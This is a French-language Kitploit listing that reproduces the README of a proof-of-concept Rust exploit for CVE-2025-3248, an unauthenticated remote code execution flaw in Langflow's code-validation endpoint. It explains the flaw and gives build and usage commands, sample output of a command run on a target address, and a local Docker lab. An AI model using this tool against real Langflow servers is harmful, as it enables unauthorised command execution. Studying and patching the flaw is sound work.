Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-3248-POC | Kitploit
Outils/GitHubGitHub/b0ysie7e/cve-2025-3248-poc
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et ÉducationLabs et Pratique
GitHubb0ysie7e/cve-2025-3248-poc

CVE-2025-3248-POC

Voir le dépôt
1il y a 8 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Exploit RCE Langflow - CVE-2025-3248

⚠️ Avertissement
Ce code est strictement destiné à des fins éducatives et de recherche uniquement. Toute utilisation non autorisée sur des systèmes sans permission explicite peut constituer une violation de la loi.
L'auteur n'est pas responsable de toute utilisation abusive ou activité malveillante impliquant cet outil.


Informations sur la vulnérabilité

CVE-2025-3248 - Critique

Score CVSS : 9,8 | Score EPSS : 92,57 % | Publié : 22 mai 2025

Versions affectées

  • Vulnérables : Toutes les versions ≤ v1.3.0
  • Corrigées : Versions v1.3.0+

Vecteur d'attaque

Le endpoint /api/v1/validate/code accepte du code Python non assaini et l'exécute directement avec exec(), sans nécessiter d'authentification.

Code vulnérable

root@kitploit:~
# langflow/api/builder/execute.py
exec(code)  # No input validation or sandboxing!

Analyse technique

Langflow expose un endpoint /api/v1/builder/execute_code qui prend le code Python fourni par l'utilisateur et le transmet directement à exec() sur le backend. Comme il n'y a ni authentification ni sandboxing, les attaquants peuvent concevoir des charges utiles arbitraires pour exécuter du code.

Exécuter l'exploit

Prérequis

  • Rust 1.70+ (installation via rustup)
  • Cargo (gestionnaire de paquets Rust)
root@kitploit:~
# Clone repository
git clone <repo-url>
cd CVE-2025-3248-POC

cargo build --release

# ./target/release/CVE-2025-3248-POC
root@kitploit:~
./CVE-2025-3248-POC --url <BASE_URL> --command "<COMMAND>"

Exemple :

root@kitploit:~
❯ ./target/release/CVE-2025-3248-POC --url 'http://192.168.159.137:7860' --command 'id'
[+] Langflow RCE Exploit - CVE-2025-3248
[+] url :http://192.168.159.137:7860, 
[+] Command: id
Status: 200 OK
uid=1000(user) gid=0(root) groups=0(root)   

Configuration du lab local

Démarrage rapide

root@kitploit:~
> cd lab
> sudo docker-compose up -d

> ./target/release/CVE-2025-3248-POC --url 'http://localhost:7860' --command 'whoami'

Arrêter le lab

root@kitploit:~
> sudo docker-compose down
Télécharger l’outil